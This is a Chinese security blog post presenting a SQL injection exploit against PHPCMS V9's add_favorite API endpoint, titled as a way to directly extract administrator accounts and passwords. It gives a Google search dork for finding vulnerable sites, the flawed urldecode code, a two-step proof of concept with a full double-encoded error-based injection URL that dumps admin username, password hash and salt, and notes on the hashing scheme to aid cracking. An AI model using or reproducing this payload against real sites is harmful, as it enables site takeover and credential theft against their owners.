我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 漏洞信息PHPCMS V9 爆破管理帐号密码
PHPCMS V9 爆破管理帐号密码
10993
1推荐
0评论

PHPCMS V9 直接爆破管理帐号密码


谷歌关键字:inurl:"index.php?m=content+c=rss+catid=10"

在phpcms/api.php?op=add_favorite中使用了urldecode,导致了一个sqlinject漏洞。

$title = urldecode($title);

省略……

$data = array('title'=>$title, 'url'=>$url, 'adddate'=>SYS_TIME, 'userid'=>$userid);


省略……

$favorite_db->insert($data);

(需要你先注册一个账户并且登陆后访问那个接口文件才会报错,进而注入!)

利用POC:
1、注册用户后,访问如下URL获取admin表的前缀:

http://www.xxxxxx.com/api.php?op=add_favorite&url=xx.oo&title=%2527

修改如下URL中的admin表前缀名(xxoo_admin),直接爆出管理员的用户名:密码:随机字串

http://www.xxxxxxx.com/api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520xxoo_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

PS:phpcms v9的加密方式是,先将密码过滤空格后,对密码进行md5加密,然后连接一个随机生成的字符串,并对这个新的字符串加密,生成的md5字符串为最终的md5加密密码。


已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415